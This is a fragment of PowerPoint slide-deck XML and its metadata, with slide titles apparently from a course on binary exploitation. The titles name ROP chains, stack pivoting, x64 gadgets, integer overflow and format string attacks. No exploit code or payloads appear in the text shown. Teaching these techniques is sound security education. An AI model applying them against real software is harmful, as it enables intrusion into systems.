              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1900" name="Shape 1900"/>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01" name="Shape 1901"/>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02" name="Shape 1902"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1893" idx="0"/>
            <a:endCxn id="1900"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03" name="Shape 1903"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1901" idx="1"/>
            <a:endCxn id="1900"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04" name="Shape 1904"/>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5" name="Shape 1905"/>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06" name="Shape 1906"/>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07" name="Shape 1907"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1900" idx="0"/>
            <a:endCxn id="1908"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09" name="Shape 1909"/>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08" name="Shape 1908"/>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910" name="Shape 1910"/>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11" name="Shape 1911"/>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12" name="Shape 1912"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1911" idx="1"/>
            <a:endCxn id="1908"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13" name="Shape 1913"/>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14" name="Shape 1914"/>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15" name="Shape 1915"/>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16" name="Shape 1916"/>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17" name="Shape 1917"/>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3F13A0EB-FD3D-41ED-854D-A46B1D925F4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10093</TotalTime>
  <Words>14001</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>2244</Paragraphs>
  <Slides>173</Slides>
  <Notes>113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173</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="186" baseType="lpstr">
      <vt:lpstr>-apple-system</vt:lpstr>
      <vt:lpstr>Noto Sans</vt:lpstr>
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>华文隶书</vt:lpstr>
      <vt:lpstr>隶书</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>1_Simple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动态链接相关结构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ROP连续调用多个libc函数</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>栈迁移</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>栈迁移</vt:lpstr>
      <vt:lpstr>栈迁移</vt:lpstr>
      <vt:lpstr>栈迁移: "pop ebp ret" + "leave ret"</vt:lpstr>
      <vt:lpstr>栈迁移: "pop ebp ret" + "leave ret"</vt:lpstr>
      <vt:lpstr>栈迁移: "pop ebp ret" + "leave ret"</vt:lpstr>
      <vt:lpstr>栈迁移: "pop ebp ret" + "leave ret"</vt:lpstr>
      <vt:lpstr>栈迁移: "pop ebp ret" + "leave ret"</vt:lpstr>
      <vt:lpstr>x64 ROP</vt:lpstr>
      <vt:lpstr>__libc_csu_init Gadgets for x64</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>Integer Overflow</vt:lpstr>
      <vt:lpstr>Integer Overflow in Linux kernel</vt:lpstr>
      <vt:lpstr>Integer Overflow Quiz</vt:lpstr>
      <vt:lpstr>Format String</vt:lpstr>
      <vt:lpstr>Format String Vuln Discovered(year2000)</vt:lpstr>
      <vt:lpstr>Format String related Functions</vt:lpstr>
      <vt:lpstr>Format String syntax</vt:lpstr>
      <vt:lpstr>Format String Example</vt:lpstr>
      <vt:lpstr>Format String Example</vt:lpstr>
      <vt:lpstr>Format String Example</vt:lpstr>
      <vt:lpstr>Format String Example</vt:lpstr>
      <vt:lpstr>Format String Code Exec</vt:lpstr>
      <vt:lpstr>Format String Usage</vt:lpstr>
      <vt:lpstr>Format String Strategy</vt:lpstr>
      <vt:lpstr>Format String tricks and gotchas</vt:lpstr>
      <vt:lpstr>Format String tricks and gotchas</vt:lpstr>
      <vt:lpstr>Format String Challenge</vt:lpstr>
      <vt:lpstr>Format String Tools and Ref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IZAYOI</dc:creator>
  <cp:lastModifiedBy>张 剑威</cp:lastModifiedBy>
  <cp:revision>275</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-05-03T14:32:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-07-21T01:42:41Z</dcterms:modified>
</cp:coreProperties>
</file>